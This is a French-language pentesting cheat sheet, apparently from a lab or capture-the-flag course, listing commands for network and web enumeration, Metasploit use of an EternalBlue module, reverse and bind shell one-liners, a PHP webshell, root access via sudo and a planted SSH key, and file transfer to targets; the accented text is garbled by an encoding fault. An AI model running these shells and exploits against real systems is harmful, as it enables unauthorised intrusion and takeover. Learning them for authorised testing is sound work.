Listes de commandes utiles pour le pentesting
Commande | Description |
---|---|
sudo openvpn user.ovpn | Se connecter au VPN |
ifconfig /ip a | Afficher notre adresse IP |
netstat -rn | Afficher les réseaux accessibles via le VPN |
ssh user@10.10.10.10 | SSH vers un serveur distant |
ftp 10.129.42.253 | FTP vers un serveur distant |
scp file user@10.129.42.253:/path/to/destination | Copier un fichier vers un serveur distant |
ping 10.10.10.10 | Tester la connectivité vers une IP |
traceroute 10.10.10.10 | Afficher le chemin des paquets vers une IP |
Commande | Description |
---|---|
ls -la | Lister les fichiers dans le répertoire courant |
cat file | Afficher le contenu dâun fichier |
find /path -name "filename" | Rechercher un fichier par nom |
tar -cvf archive.tar /path/to/directory | Créer une archive tar |
tar -xvf archive.tar | Extraire une archive tar |
nano file | Ăditer un fichier avec lâĂ©diteur nano |
echo "text" > file | Ăcrire du texte dans un fichier |
echo "text" >> file | Ajouter du texte Ă la fin dâun fichier |
chmod +x script.sh | Rendre un script exécutable |
grep "pattern" file | Rechercher un motif dans un fichier |
Commande | Description |
---|---|
whoami | Afficher lâutilisateur courant |
uname -a | Afficher les informations systĂšme |
history | Afficher lâhistorique des commandes |
clear | Effacer lâĂ©cran du terminal |
man command | Afficher le manuel dâune commande |
./script.sh | Exécuter un script dans le répertoire courant |
Commande | Description |
---|---|
nmap 10.129.42.253 | Exécuter nmap sur une IP |
nmap -sV -sC -p- 10.129.42.253 | Exécuter un scan nmap avec script et version sur une IP |
locate scripts/citrix | Lister les différents scripts nmap disponibles |
nmap --script smb-os-discovery.nse -p445 10.10.10.40 | Exécuter un script nmap sur une IP |
netcat 10.10.10.10 22 | RĂ©cupĂ©rer la banniĂšre dâun port ouvert |
smbclient -N -L \\\\10.129.42.253 | Lister les partages SMB |
smbclient \\\\10.129.42.253\\users | Se connecter Ă un partage SMB |
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 | Scanner SNMP sur une IP |
onesixtyone -c dict.txt 10.129.42.254 | Bruteforce de la chaĂźne secrĂšte SNMP |
Commande | Description |
---|---|
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt | Exécuter un scan de répertoire sur un site web |
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt | Exécuter un scan de sous-domaine sur un site web |
curl -IL https://www.inlanefreight.com | Récupérer la banniÚre du site web |
whatweb 10.10.10.121 | Lister les détails sur le serveur web/certificats |
curl 10.10.10.121/robots.txt | Lister les répertoires potentiels dans robots.txt |
ctrl+U or F12 or â+â„+I | Voir le code source de la page |
Commande | Description |
---|---|
searchsploit openssh 7.2 | Rechercher des exploits publics pour une application web |
msfconsole | Démarrer le Framework Metasploit |
search exploit eternalblue | Rechercher des exploits publics dans MSF |
use exploit/windows/smb/ms17_010_psexec | Commencer Ă utiliser un module MSF |
show options | Afficher les options requises pour un module MSF |
set RHOSTS 10.10.10.40 | Définir une valeur pour une option de module MSF |
check | Tester si le serveur cible est vulnérable |
exploit | ExĂ©cuter lâexploit sur le serveur cible sâil est vulnĂ©rable |
Commande | Description |
---|---|
nc -lvnp 1234 | Démarrer un écouteur nc sur un port local |
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' | Envoyer un reverse shell depuis le serveur distant |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f | Une autre commande pour envoyer un reverse shell depuis le serveur distant |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f | Démarrer un bind shell sur le serveur distant |
nc 10.10.10.1 1234 | Se connecter à un bind shell démarré sur le serveur distant |
python -c 'import pty; pty.spawn("/bin/bash")' | Améliorer le TTY du shell (1) |
ctrl+z puis stty raw -echo puis fg puis entrée deux fois | Améliorer le TTY du shell (2) |
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php | Créer un fichier webshell php |
curl http://@SERVER_IP:PORT/shell.php?cmd=id | Exécuter une commande sur un webshell uploadé |
Commande | Description |
---|---|
./linpeas.sh | Exécuter le script linpeas pour énumérer le serveur distant |
sudo -l | Lister les privilĂšges sudo disponibles |
sudo -u user /bin/echo Hello World! | Exécuter une commande avec sudo |
sudo su - | Basculer vers lâutilisateur root (si nous avons accĂšs Ă sudo su) |
sudo su user - | Basculer vers un utilisateur (si nous avons accĂšs Ă sudo su) |
ssh-keygen -f key | Créer une nouvelle clé SSH |
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys | Ajouter la clĂ© publique gĂ©nĂ©rĂ©e Ă lâutilisateur |
ssh root@10.10.10.10 -i key | SSH vers le serveur avec la clé privée générée |
Commande | Description |
---|---|
python3 -m http.server 8000 | Démarrer un serveur web local |
wget http://10.10.14.1:8000/linpeas.sh | Télécharger un fichier sur le serveur distant depuis notre machine locale |
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh | Télécharger un fichier sur le serveur distant depuis notre machine locale |
scp linenum.sh user@remotehost:/tmp/linenum.sh | Transférer un fichier vers le serveur distant avec scp (nécessite un accÚs SSH) |
base64 shell -w 0 | Convertir un fichier en base64 |
echo f0VMR...SNIO...InmDwU | base64 -d > shell | Convertir un fichier depuis base64 vers sa forme originale |
md5sum shell | VĂ©rifier le md5sum du fichier pour sâassurer quâil sâest converti correctement |